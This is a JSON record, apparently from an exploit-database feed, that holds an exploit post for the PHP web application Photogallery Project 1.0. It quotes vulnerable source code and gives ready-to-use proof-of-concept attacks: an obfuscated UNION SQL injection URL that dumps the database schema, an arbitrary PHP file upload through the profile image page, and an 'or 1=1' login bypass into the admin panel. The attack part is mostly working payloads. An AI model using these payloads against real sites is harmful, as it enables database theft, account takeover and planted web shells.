{"sourceData": "# # # # #\r\n# Exploit Title: Photogallery Project 1.0 - Multiple Vulnerabilities\r\n# Dork: N/A\r\n# Date: 17.08.2017\r\n# Vendor Homepage : http://surajkumar.in/\r\n# Software Link: http://surajkumar.in/product/photogallery-project-in-php/\r\n# Demo: http://surajkumar.in/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands...\r\n# The vulnerability allows an attacker to access the normal member and administration panel...\r\n# The vulnerability allows an ordinary member upload arbitrary file...\r\n# \r\n# Vulnerable Source:\r\n# # # # #\r\n# <?php\r\n# ....1\r\n# $pageContent=get_pages($_GET['page_id']);\r\n# ..\r\n# function get_pages($pageid){\r\n# $res=array();\r\n# global $connection;\r\n# if($pageid==0){\r\n# $fetchPages=mysqli_query($connection,\"SELECT * FROM \".PAGE);\r\n# }else{\r\n# $fetchPages=mysqli_query($connection,\"SELECT * FROM \".PAGE.\" WHERE id='$pageid'\");\r\n# \r\n# ....2\r\n# $userData=get_user_by_id($_SESSION['userID']);\r\n# if(isset($_POST['user_image'])){\r\n# $userImage=$_FILES['userImg']['name'];\r\n# $userTmpImage=$_FILES['userImg']['tmp_name'];\r\n# if(!file_exists('profile_pics'.'/'.$userImage)){\r\n# $img=$userImage;\r\n# }else{\r\n# $rand=rand(1,1000);\r\n# $img=$rand.'_'.$userImage;\r\n# }\r\n# if(move_uploaded_file($userTmpImage,'profile_pics'.'/'.$img)){\r\n# $updateImg=update_profile_img($img,$userData['userData']['id']);\r\n# if($updateImg['bool']==true){\r\n# \r\n# ....3\r\n# if(isset($_POST['_login'])){\r\n# $data=array();\r\n# $data['email']=$_POST['_email'];\r\n# $data['password']=$_POST['_pass'];\r\n# $loginRes=user_login($data);\r\n# if($loginRes['bool']==true){\r\n# ....\r\n# ?>\r\n# # # # #\r\n# \r\n# Proof of Concept:\r\n# \r\n# 1:\r\n# http://localhost/[PATH]/page.php?page_id=[SQL]\r\n# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/++0x283129,0x283229,0x283329,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:[email\u00a0protected]_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:[email\u00a0protected]%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529)+--+-&title=<h1>%49%68%73%61%6e%20%53%65%6e%63%61%6e</h1>\r\n# \r\n# 2:\r\n# http://localhost/[PATH]/edit_profile_img.php?profile_id=[ID]\r\n# http://localhost/[PATH]/profile_pics/[FILE].php\r\n# \r\n# 3:\r\n# http://localhost/[PATH]/login.php\r\n# http://localhost/[PATH]/admin\r\n# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='\r\n# \r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-04-10] #", "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/28304", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/28304", "type": "zdt", "viewCount": 6, "references": [], "lastseen": "2018-04-10T04:23:04", "published": "2017-08-18T00:00:00", "cvelist": [], "id": "1337DAY-ID-28304", "modified": "2017-08-18T00:00:00", "title": "Photogallery Project 1.0 - SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-10T04:23:04", "rev": 2}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28304"]}], "modified": "2018-04-10T04:23:04", "rev": 2}, "vulnersScore": 0.4}}

{}